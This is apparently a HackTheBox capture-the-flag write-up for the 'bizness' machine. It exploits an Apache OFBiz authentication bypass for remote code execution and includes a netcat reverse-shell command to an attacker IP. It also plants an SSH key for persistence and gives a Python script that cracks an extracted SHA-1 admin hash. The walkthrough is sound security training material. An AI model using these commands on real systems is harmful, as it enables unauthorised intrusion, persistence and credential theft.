HTB: bizness Writeup

Machine Information

Attribute	Details
Name	bizness
OS	Linux
Difficulty	Easy
Points	N/A
Release Date	N/A
IP Address	bizness.htb
Author	D3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

Enumeration: ⭐⭐☆☆☆
Real-world: ⭐⭐⭐☆☆
CVE: ⭐⭐☆☆☆
CTF-like: ⭐⭐☆☆☆

bizness is an Easy-difficulty Linux machine running Apache OFBiz. The attack exploits CVE-2023-49070/CVE-2023-51467 (Apache OFBiz Authentication Bypass) to gain initial access as the ofbiz user, establishes SSH persistence, and escalates to root by extracting and cracking the Derby database admin password hash.

TL;DR: Reconnaissance → Authentication Bypass (RCE) → Reverse Shell → SSH Persistence → Hash Extraction → Privilege Escalation → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- bizness.htb

Results:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH (version unspecified)
80/tcp  open  http     nginx 1.18.0 (redirects to HTTPS)
443/tcp open  https    nginx 1.18.0

Key Finding: Port 80 redirects to HTTPS. The service is powered by Apache OFBiz with nginx frontend.

Service Enumeration

Hostname: bizness.htb

Web Technologies Detected:

Apache OFBiz (backend)
nginx 1.18.0 (frontend)
jQuery v3.2.1
Bootstrap
Contact Email: info@bizness.htb

echo "10.10.16.78 bizness.htb" >> /etc/hosts

Directory Enumeration

gobuster dir -u https://bizness.htb -w /usr/share/wordlists/dirb/common.txt -k

Key Discoveries:

/control/login — OFBiz admin login panel
/solr/admin — Solr admin interface

Vulnerability Assessment

Identified Vulnerabilities:

CVE-2023-49070 / CVE-2023-51467 — Apache OFBiz Authentication Bypass leading to Remote Code Execution
- Allows unauthenticated users to bypass authentication in OFBiz administrative panels
- Can be leveraged to execute arbitrary commands on the system

Initial Foothold

Exploitation: CVE-2023-49070 / CVE-2023-51467 (Authentication Bypass RCE)

Exploit Source: https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass

The vulnerability allows unauthenticated remote code execution through the OFBiz administrative interface by bypassing authentication checks.

Setup Listener:

nc -lvnp 4444

Execute Exploit:

The exploit sends a reverse shell command to the target. The payload execution occurs through the authentication bypass mechanism:

nc -e /bin/bash <attacker_ip> 4444

This establishes a reverse shell as the ofbiz user.

Stabilizing the Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Establishing SSH Persistence

mkdir -p /home/ofbiz/.ssh
echo "your_public_key_here" > /home/ofbiz/.ssh/authorized_keys
chmod 700 /home/ofbiz/.ssh
chmod 600 /home/ofbiz/.ssh/authorized_keys

Connect via SSH:

ssh ofbiz@bizness.htb

Initial Enumeration

scp -r ofbiz@bizness.htb:/opt/ofbiz ~/ofbiz_files

Key files identified:

/opt/ofbiz/Dockerfile — Reveals hashing algorithm details
/opt/ofbiz/docker-entrypoint.sh — Password hashing mechanism
/opt/ofbiz/SECURITY.md — Security documentation

User Flag Location:

cat ~/user.txt

User Compromise

The initial reverse shell is executed as the ofbiz system user, providing direct user-level access without additional credential extraction.

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux
linpeas.sh

Key Finding: Apache OFBiz stores user credentials in the Derby embedded database.

Derby Database Hash Extraction

Database Location:

ls -la /opt/ofbiz/runtime/data/derby/

The Derby database stores hashed credentials. The admin user hash was found in .dat files:

admin$"$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN

Hash Format: $SHA$[salt]$[base64_hash]

Salt: d
Base64-encoded SHA-1 hash

Hashing Algorithm Analysis

From /opt/ofbiz/docker-entrypoint.sh, the password hashing mechanism:

Concatenate salt + password
SHA-1 hash the combined string
URL-safe base64 encode the result

Custom Hash Cracking Script

hash_decryptor.py:

import hashlib
import base64

def crack_hash(target_hash, salt, wordlist):
    """
    Crack the OFBiz password hash.
    target_hash: base64-encoded SHA-1 hash without padding
    salt: the salt value
    wordlist: path to password wordlist
    """
    with open(wordlist, 'r') as f:
        for password in f:
            password = password.strip()
            # Concatenate salt + password
            combined = salt + password
            # SHA-1 hash
            hash_obj = hashlib.sha1(combined.encode())
            # Base64 encode (URL-safe, no padding)
            encoded = base64.urlsafe_b64encode(hash_obj.digest()).decode().rstrip('=')

            if encoded == target_hash:
                return password
    return None

# Extract components from: admin$"$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN
salt = "d"
target_hash = "uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN"
wordlist = "/path/to/rockyou.txt"

password = crack_hash(target_hash, salt, wordlist)
if password:
    print(f"Password found: {password}")
else:
    print("Password not found in wordlist")

Usage:

python3 hash_decryptor.py

Root Access

Once the admin password is cracked, use it to escalate privileges or directly access the root user account.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance"] --> B["Directory Enumeration"]
    B --> C["Identify OFBiz /control/login"]
    C --> D["Exploit CVE-2023-49070/51467"]
    D --> E["Reverse Shell - ofbiz user"]
    E --> F["SSH Persistence"]
    F --> G["Access /opt/ofbiz"]
    G --> H["Extract Derby Database Hash"]
    H --> I["Crack Admin Hash rockyou.txt"]
    I --> J["Privilege Escalation"]
    J --> K["Root Access"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service fingerprinting
`gobuster`	Directory enumeration (found /control/login, /solr/admin)
`Apache-OFBiz-Authentication-Bypass`	CVE-2023-49070/51467 exploit
`nc` / `netcat`	Reverse shell listener and handler
`ssh` / `scp`	Secure shell and file transfer
`python3`	Hash cracking script development
`linpeas`	Linux privilege escalation enumeration
`hashlib`	SHA-1 hashing for password cracking
`base64`	Hash encoding/decoding

Vulnerability Reference

#	Vulnerability	Component	Severity	Impact
1	CVE-2023-49070	Apache OFBiz	Critical	Authentication Bypass - Unauthenticated RCE
2	CVE-2023-51467	Apache OFBiz	Critical	Authentication Bypass - Unauthenticated RCE
3	Weak Hashing	Derby Database	High	Password hash extractable and crackable with wordlist

Key Learnings

Authentication bypass vulnerabilities in enterprise applications (OFBiz) can provide immediate RCE without credentials.
Directory enumeration discovers hidden administrative panels (/control/login) that may be vulnerable.
Embedded databases (Derby) store password hashes that can be extracted and cracked offline using wordlists.
Understanding the target’s hashing algorithm (salt + SHA-1 + base64) is critical for successful password cracking.
Establishing SSH persistence provides reliable access for further exploitation and enumeration.
Application configuration files and source code (Dockerfile, docker-entrypoint.sh) reveal security implementation details.
Privilege escalation often comes from database access rather than traditional privilege escalation vulnerabilities.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-49070 #CVE-2023-51467 #ApacheOFBiz #AuthenticationBypass #Derby #PasswordCracking